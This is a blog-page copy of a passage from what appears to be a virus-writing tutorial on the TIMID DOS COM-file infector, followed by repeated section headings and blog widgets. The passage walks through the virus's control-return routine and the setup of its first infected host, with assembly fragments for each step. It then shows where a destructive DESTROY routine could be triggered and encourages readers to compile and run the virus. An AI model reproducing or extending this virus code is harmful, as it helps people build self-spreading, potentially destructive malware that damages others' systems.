Finally, the master control routine must return control to the host program. This involves three steps: Firstly, restore the DTA to its initial value, offset 80H,

mov dx,80H mov ah,1AH int 21H

Next, move the first five bytes of the original host program from the data area START_CODE where they are stored to the start of the host program at 100H,

Finally, the virus must transfer control to the host program at 100H. This requires a trick, since one cannot simply say “jmp 100H” because such a jump is relative, so that instruction won’t be jumping to 100H as soon as the virus moves to another file, and that spells disaster. One instruction which does transfer control to an absolute offset is the return from a call. Since we did a call right at the start of the master control routine, and we haven’t executed the corresponding return yet, executing the ret instruction will both transfer control to the host, and it will clear the stack. Of course, the return address must be set to 100H to transfer control to the host, and not somewhere else. That return address is just the word at VIR_START. So, to transfer control to the host, we write

mov WORD PTR [VIR_START],100H ret

Bingo, the host program takes over and runs as if the virus had never been there.

As written, this master control routine is a little dangerous, because it will make the virus completely invisible to the user when he runs a program... so it could get away. It seems wise to tame the beast a bit when we are just starting. So, after the call to INFECT, let’s just put a few extra lines in to display the name of the file which the virus just infected:

call INFECT mov dx,OFFSET FNAME ;dx points to FNAME mov WORD PTR [HANDLE],24H ;’$’ string terminator mov ah,9 ;DOS string write fctn int 21H EXIT_VIRUS:

This uses DOS function 9 to print the string at FNAME, which is the name of the file that was infected. Note that if someone wanted to make a malicious monster out of this virus, the destructive code could easily be put here, or after EXIT_VIRUS, depending on the conditions under which destructive activity was desired. For example, our hacker could write a routine called DESTROY, which would wreak all kinds of havoc, and then code it in like this:

call INFECT call DESTROY EXIT_VIRUS:

if one wanted to do damage only after a successful infection took place, or like this:

call INFECT

EXIT_VIRUS: call DESTROY

if one wanted the damage to always take place, no matter what, or like this:

call FIND_FILE jnz DESTROY call INFECT EXIT_VIRUS:

if one wanted damage to occur only in the event that the virus could not find a file to infect, etc., etc. I say this not to suggest that you write such a routine—please don’t—but just to show you how easy it would be to control destructive behavior in a virus (or any other program, for that matter).

The First Host

To compile and run the virus, it must be attached to a host program. It cannot exist by itself. In writing the assembly language code for this virus, we have to set everything up so the virus thinks it’s already attached to some COM file. All that is needed is a simple program that does nothing but exit to DOS. To return control to DOS, a program executed DOS function 4C Hex. That just stops the program from running, and DOS takes over. When function 4C is executed, a return code is put in al by the program making the call, where al=0 indicates successful completion of the program. Any other value indicates some kind of error, as determined by the program making the DOS call. So, the simplest COM program would look like this:

mov ax,4C00H int 21H

Since the virus will take over the first five bytes of a COM file, and since you probably don’t know how many bytes the above two instructions will take up, let’s put five NOP (no operation) instructions at the start of the host program. These take up five bytes which do nothing. Thus, the host program will look like this:

HOST: nop nop nop nop nop mov ax,4C00H int 21H

We don’t want to code it like that though! We code it to look just like it would if the virus had infected it. Namely, the NOP’s will be stored at START CODE,

START_CODE: nop nop nop nop nop

and the first five bytes of the host will consist of a jump to the virus and the letters “VI”:

HOST:

jmp NEAR VIRUS_START db ’VI’ mov ax,4C00H int 21H

There, that’s it. The TIMID virus is listed in its entirety in Appendix A, along with everything you need to compile it correctly.

I realize that you might be overwhelmed with new ideas and technical details at this point, and for me to call this virus “simple” might be discouraging. If so, don’t lose heart. Study it carefully. Go back over the text and piece together the various functional elements, one by one. And if you feel confident, you might try putting it in a subdirectory of its own on your machine and giving it a whirl. If you do though, be careful! Proceed at your own risk! It’s not like any other computer program you’ve ever run!

A Simple COM File Infector

Some DOS Basics

100 -

An Outline for a Virus

The Search Mechanism

0 Byte 0FH

8 Bit 0

The Copy Mechanism

Data Storage for the Virus

The Master Control Routine

The First Host

Love This Article ??? Let your friends also read This !!!

Post a Comment

Trending Topics

Translate

A Simple COM File Infector

Some DOS Basics

100 -

An Outline for a Virus

The Search Mechanism

0 Byte 0FH

8 Bit 0

The Copy Mechanism

Data Storage for the Virus

The Master Control Routine

The First Host

Love This Article ??? Let your friends also read This !!!

Next

Newer Post

Previous

Older Post

Post a Comment